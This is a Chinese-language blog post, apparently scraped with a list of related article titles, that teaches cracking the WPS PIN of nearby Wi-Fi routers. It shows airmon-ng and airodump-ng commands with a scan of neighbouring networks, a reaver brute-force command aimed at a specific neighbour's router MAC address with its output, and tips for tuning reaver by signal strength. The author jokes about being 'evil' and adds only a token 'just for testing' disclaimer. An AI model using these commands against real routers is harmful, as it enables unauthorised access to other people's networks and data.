使用 aircrack,寻找附近开启wps的路由器,邪恶……嘻嘻

airmon-ng start wlan0
airodump-ng mon0
CH 11 ][ Elapsed: 36 s ][ 2012-12-18 04:46                                         BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                     00:0E:2E:FD:C4:BB   -1        0        0    0  -1  -1                    <length:  0>                                                                                                              4C:E6:76:60:3F:20  -13      123        0    0  11  54e  WPA2 CCMP   PSK  cuier-1                                                                                                                   B0:48:7A:52:F4:72  -23       42        0    0   1   WPA2 CCMP   PSK  FAST_52F472                                                                                                               8C:21:0A:5F:A2:FA  -35       28        0    0   1  WPA2 CCMP   PSK  TP-LINK_5FA2FA                                                                                                            E0:05:C5:D3:3F:00  -42       33        0    0   2   WPA2 CCMP   PSK  TP-LINK_D33F00                                                                                                            EC:17:2F:7D:12:1E  -49       56        1    0   6   WPA2 CCMP   PSK  wg7788                                                                                                                    B0:48:7A:5D:22:EA  -51       36        0    0   6  WPA2 CCMP   PSK  TP-LINK_1202

使用reaver 破解开启wps功能的路由器密码

比如这条,信号还不错

8C:21:0A:5F:A2:FA -35 28 0 0 1 54e. WPA2 CCMP PSK TP-LINK_5FA2FA
root@home:~/soft/reaver-1.4#  reaver  -i  mon0  -b 8C:21:0A:5F:A2:FA  -a  -S  -vv  -d2  -t 5 -c 1Reaver v1.4 WiFi Protected Setup Attack ToolCopyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>[+] Switching mon0 to channel 1[+] Waiting for beacon from 8C:21:0A:5F:A2:FA[+] Associated with 8C:21:0A:5F:A2:FA (ESSID: TP-LINK_5FA2FA)[+] Trying pin 12345670[+] Sending EAPOL START request[+] Received identity request[+] Sending identity response

这样就开始破解了哦,耐心等待结果就好了……不要太邪恶哦。做做测试还是可以的,要做个好童鞋……

##########################################################################

附上reaver调整参数的一些小技巧
reaver:

-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key(可以提高PJ速度)
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
-t 即timeout每次穷举等待反馈的最长时间
-c指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9参数防止路由僵死
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
应因状况调整参数(-c后面都已目标频道为1作为例子)
目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1

注:54e后面有点(.)的是开了wps。但是这个要多试几次才准。可以先用Qss软件测试一下

现在的新版路由器已经加入防PING功能,,,而且默认关闭了WPS,,,WPS时代即将过去。。。。

aircrack和reaver破解路由器PIN码相关推荐

  1. Raspberry Pi下跑aircrack和reaver破解路由器PIN码

    在freebuf看到不少好文章,各种转载,留着以后用 小编:感谢minyoni的分享,freebuf希望这种从安装到安全测试全过程的paper越来越多,让国内安全paper与国外一样细致和专业. 声明 ...

  2. Kali破解路由器Pin码

    本文中涉及的所有技术仅供个人学习.技术交流,禁止用于非法用途!!请在国家法律允许的范围内使用!!! 本文中涉及的所有技术仅供个人学习.技术交流,禁止用于非法用途!!请在国家法律允许的范围内使用!!! ...

  3. aircrack加reaver破解带有wps的wifi

    最近心血来潮,想把小区里的无线信号测试个遍.基于目前大多数路由器都支持wps,想必各位基友们都知道aircrack和reaver这 两个工具,实属破解pin码,杀人越货,居家旅行之必备良药.像以前跑r ...

  4. kali-通过获取路由器pin码套取无线网络密码shell脚本

    直接上脚本吧, 我做个笔记. #************************************************************************* # > Fil ...

  5. kali拿取路由器pin码

    前序:拿pin码就可以直接跑出WPA PSK, 下面开始记录我的操作过程. 网卡监控模式 airmon-ng start wlan0 扫描 wash -i wlan0mon 破pin 网卡 物理地址 ...

  6. java跑pin码,reaver跑pin码wpc文件的修改

    reaver跑路由器pin码过程:(root权限下) 1 输入:airmon-ng start wlan0 开启监听模式 2 输入:wash -i mon0 -C 查看所有开启WPS的无线路由 长时间 ...

  7. 关于pin码破解的原理和reaver参数的解释

    路由器开启wps功能后,会随机生成一个8位的pin码,通过暴力枚举pin码,达到破解的目的,尤其现在很多路由器默认开启了wps功能.大家可能会想到8位的随机pin码将会有100000000种情况,这要 ...

  8. 无线安全专题_破解篇02--kali破解pin码

    最近项目有点紧,所以本应该上周发的文章,拖到了本周三,在此说声抱歉.无线安全专题,我打算系统地写六个部分,分别为破解篇,攻击篇,欺骗篇,路由篇,移动篇和蓝牙篇,当然在发布的过程中,可能还会掺杂着发布f ...

  9. Reaver跑pin码+Mdk3无线攻击笔记

    实例三-Reaver跑pin码破解wifi PIN码共分为8位,按 4 3 1分段,总共穷举有11000种组合.通过获取到PIN码,并记住Bssid和PIN,后期可以通过一条命令爆出无线密码. 容易碰 ...

最新文章

  1. PHP 截取字符串专题
  2. 第十四章:springboot 定时任务
  3. Java实现图片去噪和灰度的类
  4. 【转】SAP整合技术研究
  5. 【yolo】ubuntu18.04 yolo打开摄像头实时检测框目标 转化pth文件为onnx
  6. [postgresql] postgresql 安装
  7. Python之简单验证码实现
  8. hazelcast入门教程_Hazelcast入门指南第7部分
  9. Laravel框架开发规范-修订版
  10. mac怎么设置默认浏览器 mac默认浏览器设置方法
  11. iOS项目的完整重命名方法图文教程
  12. 正则表达式的使用,python正则匹配一个话题标签
  13. Kali Linux 网络扫描秘籍 第二章 探索扫描(一)
  14. Linux下卸载vmware
  15. python周报第十九周
  16. spring 使用aop 缺少依赖包aspectjweaver.jar 和spring-aop.jar报错
  17. 波束成形技术原理解析
  18. Linux下解决qtcreator中不能输入中文的问题
  19. 复旦大学有计算机网络专业,复旦大学计算机网络专业计划..doc
  20. 常见的比较二进制工具有哪些

热门文章

  1. 预备毁伤,或者深战斗
  2. Frodo and pillows CodeForces - 760B 二分 注意l和r的选择
  3. SonarQube使用教程及案例
  4. edward_mj退役经验帖(浙大2届Final队员陈伟杰的退役贴)
  5. Nginx 安装keepalived
  6. 泡面吧 一个未来之星的中国式陨落
  7. mac笔记本的触控板多次触发滚轮事件 mousewheel
  8. 奥比中光相机Gemini pro使用
  9. Cadence Allegro元件丝印及位号设置
  10. java狼羊草过河_狼羊菜过河问题深入学习分析——Java语言描述版